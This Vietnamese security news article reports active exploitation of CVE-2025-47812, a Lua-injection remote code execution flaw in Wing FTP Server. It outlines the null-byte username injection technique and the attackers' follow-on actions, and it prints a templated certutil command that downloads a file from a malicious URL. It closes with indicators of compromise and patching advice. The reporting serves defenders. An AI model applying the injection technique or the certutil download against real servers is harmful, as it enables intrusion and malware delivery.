Các nhà nghiên cứu bảo mật tại Huntress đã xác nhận lỗ hổng thực thi mã từ xa (RCE) nghiêm trọng trong Wing FTP Server, được định danh là CVE-2025-47812, đang bị khai thác tích cực. Cuộc tấn công đầu tiên được quan sát chỉ một ngày sau khi lỗ hổng này được công bố công khai. Lỗ hổng ảnh hưởng đến các phiên bản trước 7.4.4 và có thể dẫn đến thực thi mã từ xa với quyền root hoặc SYSTEM, kêu gọi các tổ chức cập nhật ngay lập tức hệ thống của mình.
Chi tiết lỗ hổng CVE-2025-47812
CVE-2025-47812 là một mối đe dọa bảo mật đáng kể xuất phát từ việc xử lý không đúng các byte null trong tham số username, đặc biệt liên quan đến tệp loginok.html chịu trách nhiệm quản lý các quy trình xác thực. Lỗ hổng này cho phép kẻ tấn công từ xa thực hiện các cuộc tấn công chèn mã Lua bằng cách khai thác điểm yếu trong xử lý byte null, có khả năng gây ảnh hưởng đến toàn bộ hệ thống.
Lỗ hổng này lần đầu tiên được công bố công khai vào ngày 30 tháng 6 năm 2025 bởi nhà nghiên cứu bảo mật Julien Ahrens, ảnh hưởng đến phần mềm giao thức truyền tệp Wing FTP Server trên các nền tảng Windows, Linux và macOS. Chỉ trong vòng 24 giờ sau khi công bố, các nhà nghiên cứu bảo mật của Huntress đã ghi nhận nỗ lực khai thác đầu tiên vào môi trường khách hàng của họ vào ngày 1 tháng 7 năm 2025, với hoạt động tấn công leo thang vào khoảng 16:15 UTC.
Chuỗi tấn công và phân tích kỹ thuật
Quá trình khai thác tuân theo một chuỗi tấn công đa bước tinh vi. Kẻ tấn công khởi tạo các nỗ lực đăng nhập vào điểm cuối loginok.html thông qua các yêu cầu POST, sử dụng thông tin đăng nhập đã biết hoặc tài khoản ẩn danh nếu có.
Quá trình khai thác
Payload độc hại bao gồm một byte null %00 được thêm vào trường username, làm gián đoạn quá trình xử lý chuỗi bình thường và cho phép chèn mã Lua độc hại. Mã được chèn bao gồm các yếu tố cú pháp cụ thể:
- Hai dấu ngoặc vuông đóng
]]để duy trì tính toàn vẹn của tệp đối tượng phiên. - Ký tự xuống dòng (newlines) để chèn mã.
- Ký hiệu nhận xét (comment symbols) để vô hiệu hóa các phần mã gốc còn sót lại.
Mã Lua độc hại sẽ được thực thi khi ứng dụng giải tuần tự hóa dữ liệu phiên trong các yêu cầu trang tiếp theo.
Các nhà nghiên cứu của Huntress đã quan sát thấy kẻ tấn công thực hiện các hoạt động do thám mở rộng, bao gồm các lệnh liệt kê hệ thống, tạo người dùng để duy trì truy cập, và cố gắng phân phối payload thông qua nhiều phương pháp khác nhau, bao gồm công cụ truy cập từ xa ScreenConnect và các tệp thực thi độc hại.
Ví dụ, các cuộc tấn công đã được phân tích cho thấy kẻ tấn công cố gắng thực thi các lệnh thông qua các payload được mã hóa thập lục phân (hex-encoded), bao gồm các nỗ lực tải xuống và thực thi các tệp nhị phân độc hại bằng tiện ích certutil của Windows. Một ví dụ về lệnh thực thi có thể bị chèn:
certutil -urlcache -f -split <malicious_url> <output_file>Dấu vết pháp y và chỉ báo thỏa hiệp (IOCs)
Lỗ hổng này để lại các dấu vết pháp y đáng kể tại nhiều vị trí trong các cài đặt Wing FTP Server:
-
Tệp nhật ký (Log files): Nằm trong
C:\Program Files (x86)\Wing FTP Server\Log\, chứa các mục bị cắt cụt cho thấy nỗ lực khai thác. - Tệp đối tượng phiên (Session object files): Trong thư mục phiên, tiết lộ mã Lua được chèn với kích thước tệp tăng lên đáng kể một cách bất thường. Phân tích các tệp phiên đã tiết lộ kẻ tấn công cố gắng thực thi các lệnh thông qua các payload được mã hóa thập lục phân.
Microsoft Defender đã chặn thành công một số nỗ lực tấn công, xác định các mối đe dọa là Trojan:Win32/Ceprolad.A.
Chỉ báo thỏa hiệp (IOCs)
Các chỉ báo thỏa hiệp (IOCs) liên quan đến hoạt động khai thác CVE-2025-47812 đã được xác định:
- Malware Detection:
Trojan:Win32/Ceprolad.A
Biện pháp giảm thiểu và khuyến nghị
Các tổ chức đang sử dụng Wing FTP Server nên cập nhật ngay lập tức lên phiên bản 7.4.4 hoặc mới hơn để giảm thiểu lỗ hổng đang bị khai thác tích cực này. Ngoài ra, các nhóm bảo mật nên thực hiện các biện pháp giám sát sau:
- Kiểm tra tệp nhật ký: Giám sát các tệp nhật ký để tìm các mục nhập username bị cắt cụt, đây là dấu hiệu của nỗ lực khai thác.
- Phân tích tệp phiên: Kiểm tra các tệp đối tượng phiên để tìm kích thước hoặc nội dung bất thường, đặc biệt là sự hiện diện của mã Lua không mong muốn.
Với thời gian khai thác nhanh chóng sau khi công bố, lỗ hổng này đại diện cho một rủi ro bảo mật nghiêm trọng đòi hỏi sự chú ý ngay lập tức từ các quản trị viên hệ thống và chuyên gia bảo mật.
